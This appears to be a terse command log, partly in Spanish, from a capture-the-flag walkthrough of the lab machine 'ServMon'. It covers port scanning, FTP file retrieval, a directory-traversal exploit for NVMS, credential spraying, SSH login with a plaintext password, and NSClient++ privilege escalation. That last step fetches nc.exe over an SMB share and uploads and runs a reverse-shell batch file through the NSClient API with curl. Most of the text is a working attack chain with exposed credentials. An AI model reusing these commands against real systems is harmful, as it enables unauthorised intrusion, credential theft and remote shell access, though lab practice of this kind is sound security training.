nmap -A -p- -oA servmon 10.129.96.105 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA servmon 10.129.96.105
nmap -sU -O -p- -oA servmon-udp 10.129.96.105
nikto -h 10.129.96.105:80
ftp 10.129.96.105
cd Users\Nadine
get Confidential.txt
cat Confidential.txt
cat Notes to do.txt
crackmapexec smb 10.129.96.105
smbclient -L 10.129.96.105 -N
http://10.129.96.105
searchsploit NVMS
cat 47774.txt
Abrimos burp suite y hacemos a la siguiente url:
Nos encontramos unas contrasenas Y los metemos en un archivo credentials.txt
crackmapexec smb 10.129.96.105 -u users -p credentials.txt
ssh nadine@servmon.htb
nadine:L1k3B1gBut7s@W0rk
whoami /priv
whoami /all
net user Nadine
http://10.129.179.121:8443
searchsploit nsclient
searchsploit -m 46802
cat 46802.txt
Leemos las intrucciones del exploit
cd C:\Program Files\NSClient
nscp web --password --display
No nos funciona la contrasena
Hacemos un port forwarding
Usamos la contrasena ew2x6SsGTxjRwXOT
Aseguramos que este habilitado
Creamos un bat file y le ponemos el codigo para un reverse shell
copy \\10.10.14.135\smbFolder\nc.exe nc.exe
sudo python3 /opt/impacket/smbserver.py smbFolder $(pwd) -smb2support
net use x: \\10.10.14.135\smbFolder /user:cu3rv0x password123
copy x:\reverse.bat reverse.bat
copy x:\nc.exe nc.exe
Le damos click a Add pero no me funciona.
curl -k -u "admin:ew2x6SsGTxjRwXOT" -XPUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/reverse.bat --data-binary @reverse.bat
curl -k -u "admin:ew2x6SsGTxjRwXOT" https://127.0.0.1:8443/api/v1/queries/reverse/commands/execute
nc -lvnp 443